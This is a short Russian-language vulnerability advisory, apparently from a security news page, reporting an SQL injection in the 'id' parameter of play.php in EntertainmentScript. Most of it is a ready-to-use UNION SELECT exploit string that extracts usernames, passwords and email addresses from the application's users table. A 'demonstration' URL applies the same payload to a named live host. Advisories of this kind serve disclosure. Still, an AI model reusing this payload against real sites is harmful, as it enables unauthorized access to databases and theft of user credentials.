Программа: EntertainmentScript

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием play.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

play.php?id=-96969+union+select+0x28284d722e53514c2929,
concat(username,0x3a3a3a3a3a,password),3, 4,email,6+from+users/*

Демонстрация:

http://demo.fastfreemedia.com/play.php?id=-96969+union+select+
0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,
password),3,4,email,6+from+users/*



Оставить мнение